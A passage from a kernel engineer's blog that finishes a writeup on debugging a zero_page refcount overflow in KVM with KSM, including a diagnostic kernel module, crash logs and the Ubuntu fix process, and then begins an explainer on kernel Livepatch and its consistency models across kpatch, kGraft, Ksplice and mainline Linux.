set it near overflow. Note that <code class="language-plaintext highlighter-rouge">atomic_set()</code> takes a 32 bit <code class="language-plaintext highlighter-rouge">int</code>, so the
constant is silently truncated to 0x7FFFFF00, just 256 increments short of overflow.</p>
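<p>A tiny sketch confirms what that constant actually becomes once it passes
through a 32 bit <code class="language-plaintext highlighter-rouge">int</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>

int main(void)
{
    /* atomic_set() takes an int, so only the low 32 bits of the
     * 48 bit constant used in the module survive. */
    int truncated = (int)0xFFFF7FFFFF00LL;

    /* Prints 0x7fffff00 (2147483392): 256 increments from overflow. */
    printf("stored in atomic_t: 0x%x (%d)\n", truncated, truncated);
    return 0;
}
</code></pre></div></div>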
<p>The complete module is below:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
* zero_page_refcount.c - view zero_page reference counter in real time
* with the proc filesystem.
*
* Author: Matthew Ruffell <matthew.ruffell@canonical.com>
*
* Steps:
*
* $ sudo apt-get -y install gcc make libelf-dev linux-headers-$(uname -r)
*
* cat <<EOF >Makefile
obj-m=zero_page_refcount.o
KVER=\$(shell uname -r)
MDIR=\$(shell pwd)
default:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) modules
clean:
$(echo -e '\t')make -C /lib/modules/\$(KVER)/build M=\$(MDIR) clean
EOF
*
* $ make
* $ sudo insmod zero_page_refcount.ko
* # To display current zero_page reference count:
* $ cat /proc/zero_page_refcount
* # To set zero_page reference count to near overflow:
* $ cat /proc/zero_page_refcount_set
*/</span>
<span class="cp">#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
</span>
<span class="cp">#include <linux/atomic.h>
#include <asm/pgtable.h>
</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_show_set</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span> <span class="o">=</span> <span class="n">virt_to_page</span><span class="p">(</span><span class="n">empty_zero_page</span><span class="p">);</span>
<span class="n">atomic_set</span><span class="p">(</span><span class="o">&</span><span class="n">page</span><span class="o">-></span><span class="n">_refcount</span><span class="p">,</span> <span class="mh">0xFFFF7FFFFF00</span><span class="p">);</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Zero Page Refcount set to 0x1FFFFFFFFF000</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_open_set</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="n">single_open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">zero_page_refcount_show_set</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span> <span class="n">zero_page_refcount_set_fops</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">owner</span> <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">.</span><span class="n">open</span> <span class="o">=</span> <span class="n">zero_page_refcount_open_set</span><span class="p">,</span>
<span class="p">.</span><span class="n">read</span> <span class="o">=</span> <span class="n">seq_read</span><span class="p">,</span>
<span class="p">.</span><span class="n">llseek</span> <span class="o">=</span> <span class="n">seq_lseek</span><span class="p">,</span>
<span class="p">.</span><span class="n">release</span> <span class="o">=</span> <span class="n">single_release</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_show</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">v</span><span class="p">)</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span> <span class="o">=</span> <span class="n">virt_to_page</span><span class="p">(</span><span class="n">empty_zero_page</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">reference_count</span> <span class="o">=</span> <span class="n">atomic_read</span><span class="p">(</span><span class="o">&</span><span class="n">page</span><span class="o">-></span><span class="n">_refcount</span><span class="p">);</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Zero Page Refcount: 0x%x or %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">reference_count</span><span class="p">,</span> <span class="n">reference_count</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">zero_page_refcount_open</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="n">single_open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">zero_page_refcount_show</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span> <span class="n">zero_page_refcount_fops</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">owner</span> <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">.</span><span class="n">open</span> <span class="o">=</span> <span class="n">zero_page_refcount_open</span><span class="p">,</span>
<span class="p">.</span><span class="n">read</span> <span class="o">=</span> <span class="n">seq_read</span><span class="p">,</span>
<span class="p">.</span><span class="n">llseek</span> <span class="o">=</span> <span class="n">seq_lseek</span><span class="p">,</span>
<span class="p">.</span><span class="n">release</span> <span class="o">=</span> <span class="n">single_release</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">static</span> <span class="kt">int</span> <span class="n">__init</span> <span class="nf">zero_page_refcount_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="n">proc_create</span><span class="p">(</span><span class="s">"zero_page_refcount"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">zero_page_refcount_fops</span><span class="p">);</span>
<span class="n">proc_create</span><span class="p">(</span><span class="s">"zero_page_refcount_set"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">zero_page_refcount_set_fops</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">void</span> <span class="n">__exit</span> <span class="nf">zero_page_refcount_exit</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="n">remove_proc_entry</span><span class="p">(</span><span class="s">"zero_page_refcount"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="n">remove_proc_entry</span><span class="p">(</span><span class="s">"zero_page_refcount_set"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">MODULE_LICENSE</span><span class="p">(</span><span class="s">"GPL"</span><span class="p">);</span>
<span class="n">module_init</span><span class="p">(</span><span class="n">zero_page_refcount_init</span><span class="p">);</span>
<span class="n">module_exit</span><span class="p">(</span><span class="n">zero_page_refcount_exit</span><span class="p">);</span>
</code></pre></div></div>
<p>You can download the completed module <a href="/assets/bin/zero_page_refcount.c">here</a>.</p>
<p>This time, if we build and insert it into the running kernel, we can set the
reference counter to near overflow:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount_set
Zero Page Refcount <span class="nb">set </span>to 0x7FFFFF00
</code></pre></div></div>
<p>After that, we can watch it overflow:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x7fffff16 or 2147483414
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x80000000 or <span class="nt">-2147483648</span>
</code></pre></div></div>
<p>See that? It wrapped around from 2147483414 to -2147483648! That’s a signed
integer overflow.</p>
<p>If we check the status of our virtual machines, still being cycled by that
infinite script, we see they are now paused:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ virsh list
Id Name State
----------------------------------------------------
1 instance-0 paused
2 instance-1 paused
</code></pre></div></div>
<p>If we check dmesg, we see the exact same kernel oops:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 167.695986] WARNING: CPU: 1 PID: 3016 at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/include/linux/mm.h:852 follow_page_pte+0x6f4/0x710
[ 167.696023] CPU: 1 PID: 3016 Comm: CPU 0/KVM Tainted: G OE 4.15.0-106-generic #107~16.04.1-Ubuntu
[ 167.696023] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1 04/01/2014
[ 167.696025] RIP: 0010:follow_page_pte+0x6f4/0x710
[ 167.696026] RSP: 0018:ffffa81802023908 EFLAGS: 00010286
[ 167.696027] RAX: ffffed8786e33a80 RBX: ffffed878c6d21b0 RCX: 0000000080000000
[ 167.696027] RDX: 0000000000000000 RSI: 00003ffffffff000 RDI: 80000001b8cea225
[ 167.696028] RBP: ffffa81802023970 R08: 80000001b8cea225 R09: ffff90c4d55fa340
[ 167.696028] R10: 0000000000000000 R11: 0000000000000000 R12: ffffed8786e33a80
[ 167.696029] R13: 0000000000000326 R14: ffff90c4db94fc50 R15: ffff90c4d55fa340
[ 167.696030] FS: 00007f6a7798c700(0000) GS:ffff90c4edc80000(0000) knlGS:0000000000000000
[ 167.696030] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 167.696031] CR2: 0000000000000000 CR3: 0000000315580002 CR4: 0000000000162ee0
[ 167.696033] Call Trace:
[ 167.696047] follow_pmd_mask+0x273/0x630
[ 167.696049] follow_page_mask+0x178/0x230
[ 167.696051] __get_user_pages+0xb8/0x740
[ 167.696052] get_user_pages+0x42/0x50
[ 167.696068] __gfn_to_pfn_memslot+0x18b/0x3b0 [kvm]
[ 167.696079] ? mmu_set_spte+0x1dd/0x3a0 [kvm]
[ 167.696090] try_async_pf+0x66/0x220 [kvm]
[ 167.696101] tdp_page_fault+0x14b/0x2b0 [kvm]
[ 167.696104] ? vmexit_fill_RSB+0x10/0x40 [kvm_intel]
[ 167.696114] kvm_mmu_page_fault+0x62/0x180 [kvm]
[ 167.696117] handle_ept_violation+0xbc/0x160 [kvm_intel]
[ 167.696119] vmx_handle_exit+0xa5/0x580 [kvm_intel]
[ 167.696129] vcpu_enter_guest+0x414/0x1260 [kvm]
[ 167.696138] ? kvm_arch_vcpu_load+0x4d/0x280 [kvm]
[ 167.696148] kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[ 167.696157] ? kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[ 167.696165] kvm_vcpu_ioctl+0x33a/0x610 [kvm]
[ 167.696166] ? do_futex+0x129/0x590
[ 167.696171] ? __switch_to+0x34c/0x4e0
[ 167.696174] ? __switch_to_asm+0x35/0x70
[ 167.696176] do_vfs_ioctl+0xa4/0x600
[ 167.696177] SyS_ioctl+0x79/0x90
[ 167.696180] ? exit_to_usermode_loop+0xa5/0xd0
[ 167.696181] do_syscall_64+0x73/0x130
[ 167.696182] entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[ 167.696184] RIP: 0033:0x7f6a80482007
[ 167.696184] RSP: 002b:00007f6a7798b8b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[ 167.696185] RAX: ffffffffffffffda RBX: 000000000000ae80 RCX: 00007f6a80482007
[ 167.696185] RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000016
[ 167.696186] RBP: 000055fe135f3240 R08: 000055fe118be530 R09: 0000000000000001
[ 167.696186] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
[ 167.696187] R13: 00007f6a85852000 R14: 0000000000000000 R15: 000055fe135f3240
[ 167.696188] Code: 4d 63 e6 e9 f2 fc ff ff 4c 89 45 d0 48 8b 47 10 e8 22 f0 9e 00 4c 8b 45 d0 e9 89 fc ff ff 4c 89 e7 e8 81 3f fd ff e9 aa fc ff ff <0f> 0b 49 c7 c4 f4 ff ff ff e9 c1 fc ff ff 0f 1f 40 00 66 2e 0f
[ 167.696200] ---[ end trace 7573f6868ea8f069 ]---
</code></pre></div></div>
<p>The QEMU crash is the same as well. We can reproduce the problem!</p>
<h1 id="testing-the-test-kernel">Testing the test Kernel</h1>
<p>After that good news, I installed the test kernel I had built onto the lab
machine.</p>
<p>After rebooting and recompiling the kernel module we made, I started the script
to create and destroy VMs and had a look at the reference counter:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x1 or 1
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x1 or 1
<span class="nv">$ </span><span class="nb">cat</span> /proc/zero_page_refcount
Zero Page Refcount: 0x1 or 1
</code></pre></div></div>
<p>Interesting. The fix seems to keep the reference counter glued to 1. It never
changes, so it will never overflow. Looks good; the identified fix really does
solve the problem. That’s reassuring.</p>
<h1 id="landing-the-fix-in-the-kernel">Landing the Fix in the Kernel</h1>
<p>As with all kernel bugs, we need to follow the <a href="https://wiki.ubuntu.com/StableReleaseUpdates">Stable Release
Updates</a> procedure, and follow the
special <a href="https://wiki.ubuntu.com/KernelTeam/KernelUpdates">kernel specific rules</a>.</p>
<p>This involves opening a Launchpad bug and filling out an SRU template:</p>
<ul>
<li><a href="https://bugs.launchpad.net/bugs/1837810">https://bugs.launchpad.net/bugs/1837810</a></li>
</ul>
<p>From there, I determined that the fixes needed to be landed in the 4.15 and
5.4 Ubuntu kernels, and I prepared patches to be submitted to the Ubuntu Kernel
Mailing list:</p>
<ul>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112749.html">Cover Letter</a></li>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112750.html">Patch</a></li>
</ul>
<p>After that, the patches get reviewed by senior members of the kernel team, and
require 2 acks from them before they are accepted into the next SRU cycle:</p>
<ul>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112772.html">ACK 1</a></li>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112775.html">ACK 2</a></li>
</ul>
<p>From there, the patches were applied to the 4.15 and 5.4 kernel git trees:</p>
<ul>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112974.html">Applied 4.15</a></li>
<li><a href="https://lists.ubuntu.com/archives/kernel-team/2020-August/112844.html">Applied 5.4</a></li>
</ul>
<p>From there we can check what kernel versions this will be included in:</p>
<p>For the 4.15 kernel:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git log --grep "KVM: fix overflow of zero page refcount with ksm running"
commit 4047f81f064d45f9f7e1ae9cac9a000f37af714c
Author: Zhuang Yanying <ann.zhuangyanying@huawei.com>
Date: Mon Aug 17 11:51:54 2020 +1200
KVM: fix overflow of zero page refcount with ksm running
$ git describe --contains 4047f81f064d45f9f7e1ae9cac9a000f37af714c
Ubuntu-4.15.0-116.117~13
</code></pre></div></div>
<p>and the 5.4 kernel:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git log --grep "KVM: fix overflow of zero page refcount with ksm running"
commit 62f890e92628903a4fa2febd854edd12a0cea63a
Author: Zhuang Yanying <ann.zhuangyanying@huawei.com>
Date: Mon Aug 17 11:51:54 2020 +1200
KVM: fix overflow of zero page refcount with ksm running
$ git describe --contains 62f890e92628903a4fa2febd854edd12a0cea63a
Ubuntu-5.4.0-46.50~509
</code></pre></div></div>
<p>The fix is tagged for the 4.15.0-116-generic and 5.4.0-46-generic kernels. These
should be released to -updates within a few weeks of this blog post, and then
everyone can get this problem fixed.</p>
<h1 id="conclusion">Conclusion</h1>
<p>That is how it’s done. We looked into a failure on an OpenStack compute node
which paused all of its virtual machines, and we debugged the problem down
to the kernel’s zero_page reference counter overflowing when Kernel Samepage
Merging is enabled.</p>
<p>We did some detective work, and managed to reproduce the problem without having
to wait months for it to trigger, and learned about writing a kernel
module to help with our debugging. Finally, we got the fix landed in the
Ubuntu kernels.</p>
<p>I hope you enjoyed the read, and as always, feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellRecently I worked a particularly interesting case where an OpenStack compute node had all of its virtual machines pause at the same time, which I attributed to a reference counter overflowing in the kernel’s zero_page. Today, we are going to take an in-depth look at the problem at hand, and see how I debugged and fixed the issue, from beginning to completion. Let’s get started.Everything You Wanted to Know About Kernel Livepatch in Ubuntu2020-04-20T00:00:00+00:002020-04-20T00:00:00+00:00https://ruffell.nz/programming/writeups/2020/04/20/everything-you-wanted-to-know-about-kernel-livepatch-in-ubuntu<p>One of the more recent killer features implemented by most major Linux distros
these days is the ability to patch the kernel while it is running, without the
need for a reboot.</p>
<p>While this may sound like sorcery for some, this is a very real feature, called
Livepatch. Livepatch uses ftrace in new and interesting ways, by patching in
calls at the beginning of existing functions to new patched functions, delivered
as kernel modules.</p>
<p>This lets you update and fix bugs on the fly, although its use is typically
reserved for security critical fixes only.</p>
<p><img src="/assets/images/2020_018.png" alt="hero" /></p>
<p>The whole concept is extremely interesting, so today we will look into what
Livepatch is, how it is implemented across several distros, we will write some
Livepatches of our own, and look at how Livepatch works in Ubuntu for end users.</p>
<!--more-->
<h1 id="why-do-we-need-livepatch">Why Do We Need Livepatch?</h1>
<p>Working in Sustaining Engineering at Canonical, it is pretty common to see
bug reports from machines which have very high uptimes, such as six to twelve
months, or sometimes even longer.</p>
<p>These machines normally run important workloads which can’t be interrupted for
a reboot, since they might be a part of critical public infrastructure, or a
busy build system. The Ubuntu Kernel Team typically releases a new updated
kernel for each distribution release on a <a href="https://kernel.ubuntu.com/">3 week SRU cycle</a>
with additional updates always within a day or two of a new CVE being released.</p>
<p>Machines with important workloads aren’t going to want to reboot every
six months, let alone every three weeks for each new kernel release. Keeping
these machines safe and up to date with security fixes is a must, and this
is the motivation behind Livepatch.</p>
<h1 id="what-is-livepatch">What is Livepatch?</h1>
<p>Livepatch is the ability for the kernel to change the flow of code execution
from a broken or vulnerable function, to a new, fixed function during runtime.</p>
<p>In most cases, the new function is the exact same as the function it is replacing,
but with minor changes, such as adding a check for null, or changing the order
of some locks or adding a quick logic fix.</p>
<p>The code redirection is achieved with <a href="https://www.kernel.org/doc/Documentation/trace/ftrace.txt">ftrace</a>.
ftrace is a tool which lets you trace kernel function calls, but it can also
add and remove instructions from functions. A good example is kprobes,
which can patch blocks of code into existing functions, and is usually used to
print debug values. kprobes are mostly ftrace based these days, which is
important: we don’t want kprobes and Livepatch to clash and patch the same
function at the same time, so ftrace arbitrates ownership of each function.</p>
<p>Livepatch is implemented by compiling the new fixed function into a kernel module
and loading it into the system. ftrace is then used to redirect calls from the
old function to the new function in the kernel module. This process actually has
to be done very carefully, and we will discuss it in the next section, when we
cover different consistency models.</p>
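<p>To make this concrete, here is a minimal sketch of what such a module looks
like, modelled on the upstream <code class="language-plaintext highlighter-rouge">samples/livepatch/livepatch-sample.c</code>. The
exact API has shifted between kernel versions; this follows the newer form
where <code class="language-plaintext highlighter-rouge">klp_enable_patch()</code> also handles registration:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/livepatch.h>
#include <linux/seq_file.h>

/* The replacement function: same signature as the function it
 * replaces, here cmdline_proc_show(), with the fix applied. */
static int livepatch_cmdline_proc_show(struct seq_file *m, void *v)
{
	seq_printf(m, "%s\n", "this has been live patched");
	return 0;
}

/* Map the old function name to its replacement. */
static struct klp_func funcs[] = {
	{
		.old_name = "cmdline_proc_show",
		.new_func = livepatch_cmdline_proc_show,
	}, { }
};

/* A NULL object name means the function lives in vmlinux itself,
 * rather than in another module. */
static struct klp_object objs[] = {
	{
		.funcs = funcs,
	}, { }
};

static struct klp_patch patch = {
	.mod = THIS_MODULE,
	.objs = objs,
};

static int livepatch_init(void)
{
	/* Registers the patch and asks ftrace to redirect callers. */
	return klp_enable_patch(&patch);
}

static void livepatch_exit(void)
{
}

module_init(livepatch_init);
module_exit(livepatch_exit);
MODULE_LICENSE("GPL");
MODULE_INFO(livepatch, "Y");
</code></pre></div></div>
<p>After <code class="language-plaintext highlighter-rouge">insmod</code>, reading <code class="language-plaintext highlighter-rouge">/proc/cmdline</code> would show the patched output, and the
patch can be toggled through <code class="language-plaintext highlighter-rouge">/sys/kernel/livepatch/</code>.</p>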
<p>For the actual implementation, it is remarkably simple.</p>
<p>Have you ever disassembled a kernel function before and wondered why every
kernel function begins with a full sized padded <code class="language-plaintext highlighter-rouge">nop</code> instruction?</p>
<p>For example, let’s look at <code class="language-plaintext highlighter-rouge">sysrq_handle_crash()</code>, as seen in my previous
article <a href="/programming/writeups/2019/02/22/beginning-kernel-crash-debugging-on-ubuntu-18-10.html">Beginning Kernel Crash Debugging on Ubuntu 18.10</a>.</p>
<p><img src="/assets/images/2019_119.png" alt="nop instruction" /></p>
<p>Well, what ftrace does is patch out the <code class="language-plaintext highlighter-rouge">nop</code> with a <code class="language-plaintext highlighter-rouge">call</code> which points towards
the new function. If you look carefully, the <code class="language-plaintext highlighter-rouge">nop</code> is located before the function
starts manipulating the stack, which means everything is consistent, and very
elegant.</p>
<p><img src="/assets/images/2020_014.svg" alt="livepatch" /></p>
<p><a href="https://en.wikipedia.org/wiki/File:Linux_kernel_live_patching_kpatch.svg">Credit and license for image</a></p>
<p>The above image demonstrates this behaviour very well. Now, this technique works
great at a function level, where logic changes but data does not.</p>
<p>Limitations quickly arise within Livepatch when data changes are required. If a
new member needs to be added to or removed from a struct defined within the
function or the file, these changes cannot be carried over to the Livepatched version,
since you cannot modify data structures during runtime, as they may be in use
by different tasks on different cpus. The same goes for changing the function
signature, since the calling function would have to rearrange the variables pushed onto
the stack. Livepatch is also limited to modifying functions which are traceable
by ftrace, and not all kernel functions can be traced.</p>
<p>Because of these limitations, and the complexity that arises from the consistency
models which we will discuss next, Livepatch is more of a temporary band-aid
solution, reserved for fixing critical security issues until such a time comes
when the host can be rebooted into an updated kernel.</p>
<h1 id="consistency-models-and-varying-implementations">Consistency Models and Varying Implementations</h1>
<p>As mentioned in the previous section, the real complexity behind Livepatch is
the decision making process required when ftrace actually performs the switch
from the old function to the new function.</p>
<p>Say the changes to the new function are basic. Adding a null pointer check sort
of basic. The semantics of the function itself haven’t changed, and there is
no existing state to manage. All we have to do then is check to see if any
tasks are running which are using the old function. This can be done by examining
the stack of sleeping tasks. If the function is not found in any of them, we can
easily patch the change in.</p>
<p>But what happens if a task is using the old function? Do we make a rule and say
all tasks must be stopped, we patch, and then start them all again? Or do we
add complexity by adding a list of tasks that use the old function, and tasks
that use the new function, and maintain a trampoline which decides between each
function for a given task?</p>
<p>What happens if the Livepatch changes the order that locks are acquired and
released? The affected tasks which hold those locks need to be patched when the
locks are no longer held, and the entire system needs to switch over to the
new function at the same time. How do we co-ordinate this?</p>
<p>This is where consistency models come in, and they are the driving force behind the
different implementations of Livepatch. Each distribution has its own opinion on
how things should be done, and we will look at all of them.</p>
<h2 id="kpatch">kpatch</h2>
<p><a href="https://en.wikipedia.org/wiki/Kpatch">kpatch</a> is developed by Red Hat, and
uses the simplest consistency model. kpatch operates pretty much as previously
explained, by using ftrace to change the <code class="language-plaintext highlighter-rouge">nop</code> instruction in the old function
to a <code class="language-plaintext highlighter-rouge">call</code> instruction, pointing to the new function.</p>
<p><img src="/assets/images/2020_014.svg" alt="livepatch" /></p>
<p>kpatch keeps the system consistent by first stopping all running tasks. The
stack trace of each task is then examined. If the old function is not found in
any of the tasks’ stack traces, then ftrace applies the patch, and all future
calls to the patched function will use the new function.</p>
<p>This approach is atomic and safe, since there is only one view of the function
at any time: it is either old or new. This avoids the consistency issues that would
arise if the new function changed data structures differently to the old function,
and those structures were then passed to tasks which had not yet been migrated to the
new function.</p>
<p>The limitations of kpatch are that data structures cannot be modified, and that
if a task is still using the function to be patched, patching fails, all tasks
are resumed, and the patch is attempted again at a later time. There is also some
overhead in stopping and starting all tasks, which results in a small loss of service
while those tasks are stopped.</p>
<h2 id="kgraft">kGraft</h2>
<p><a href="https://en.wikipedia.org/wiki/KGraft">kGraft</a> is developed by SUSE, and is by
far the most complex consistency model. kGraft employs a per task consistency
model, where all tasks remain running on the system, and tasks are patched one
by one. This gives no downtime at all, since all tasks keep running during
Livepatch, and patching can never “fail” in entirety.</p>
<p>kGraft achieves this by maintaining consistent “world views” to userspace
processes, kernel threads and interrupt handlers, during their execution in
kernel space.</p>
<p>For example, let’s say we have a userspace process making a syscall, and a
Livepatch request comes in midway through this syscall.</p>
<p><img src="/assets/images/2020_015.svg" alt="syscall" /></p>
<p>If the syscall calls the function to be patched multiple times, then on a
subsequent call of the now-patched function, the semantics might have
changed since the first time it was executed. If locking orders have changed,
we might be facing a deadlock, which will end in certain failure.</p>
<p><img src="/assets/images/2020_016.svg" alt="syscall" /></p>
<p>Instead, what kGraft does is insert a trampoline as the target of the
<code class="language-plaintext highlighter-rouge">call</code> instruction that replaces the <code class="language-plaintext highlighter-rouge">nop</code>. The trampoline points to both
the old function and the new function. If the task has not yet been migrated
to use the new function, the trampoline jumps to the old function and execution
continues. If the task has been migrated, then the new function is called.</p>
<p>This means that any userspace process in a syscall, or kernel task, or interrupt
handler still in kernel space will always use the old function.</p>
<p><img src="/assets/images/2020_017.svg" alt="syscall" /></p>
<p>This continues until each userspace process finishes its syscall, or each kernel task
completes, or each interrupt handler returns. At that point, the task is then
migrated over to the new function. When all tasks have been migrated, the
trampoline is removed, and the <code class="language-plaintext highlighter-rouge">call</code> instruction is updated to point directly
to the new function.</p>
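<p>To make the trampoline idea concrete, here is a small userspace analogy of my own, not kGraft code: a per-thread flag stands in for the per-task migration state kGraft keeps in the kernel, and the trampoline picks an implementation based on it:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdbool.h>
#include <stdio.h>

/* Hypothetical old and new implementations of the same function. */
static int old_impl(int x) { return x + 1; }
static int new_impl(int x) { return x + 2; }

/* Stand-in for the per-task "migrated" flag kGraft keeps in the kernel. */
static __thread bool task_migrated = false;

/* The trampoline: call sites are redirected here, and it decides which
 * implementation the current task should see. */
static int trampoline(int x)
{
	return task_migrated ? new_impl(x) : old_impl(x);
}

int main(void)
{
	printf("before migration: %d\n", trampoline(1)); /* old behaviour */
	task_migrated = true;  /* the task leaves kernel space and is migrated */
	printf("after migration:  %d\n", trampoline(1)); /* new behaviour */
	return 0;
}
</code></pre></div></div>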
<p>The benefit of kGraft is that all tasks are kept running during Livepatch.
The downside is that two different implementations of the same function are kept
around at the same time. This can cause problems when long running processes,
like those waiting on disk or network I/O, get stuck in kernel space and won’t
be patched until they complete. This can lead to inconsistencies if the new
function changes internal data structures differently to the original, since
both functions can still be executed in parallel.</p>
<h2 id="ksplice">Ksplice</h2>
<p><a href="https://en.wikipedia.org/wiki/Ksplice">Ksplice</a> is developed by Oracle, and
has a consistency model similar to kpatch. Ksplice stops all tasks before
patching the functions atomically.</p>
<p>The differentiating feature of Ksplice is the ability to patch functions which
require changes to data structures. This process is not automatic though: a
programmer must add extra code to the Livepatch module which handles
the transition from the old data structure to the new one.</p>
<h2 id="livepatch-mainline-linux">Livepatch (Mainline Linux)</h2>
<p>Livepatch was mainlined into the Linux kernel during the 4.0 development cycle.</p>
<p>The <a href="https://www.kernel.org/doc/Documentation/livepatch/livepatch.txt">Livepatch implementation</a>
is a hybrid between the kpatch and kGraft implementations, taking the best ideas
from both. Livepatch uses kGraft’s per task consistency and syscall exit
migration, alongside kpatch’s stack trace based switching.</p>
<p>Patches are applied on a per task basis, one task at a time. There is no
downtime as tasks do not need to be stopped. This also means that the trampoline
based solution is used.</p>
<p>The consistency model for mainline operates in a set of steps:</p>
<ol>
<li>Firstly, the stack trace of sleeping tasks is checked. If the function to be
patched is not found in the stack trace, the task is patched to use the new
function. If this check fails for a particular task, the stack trace is re-examined
periodically and the patch is attempted again later. Most, if not all, tasks will be
patched in this step.</li>
<li>The second step is to patch a task once it completes its work in kernel
space and exits, such as when a syscall finishes or an interrupt handler completes. This is
useful for long running I/O or CPU-bound tasks. In some cases, SIGSTOP must be
issued to an I/O bound task to force it to exit the kernel and be patched, and then
SIGCONT is sent so it can continue.</li>
<li>The kernel “swapper” task, which runs whenever the CPU is idle and
never exits the kernel, has a special <code class="language-plaintext highlighter-rouge">klp_update_patch_state()</code> call in the
idle loop which patches the task before the CPU enters the idle state.</li>
</ol>
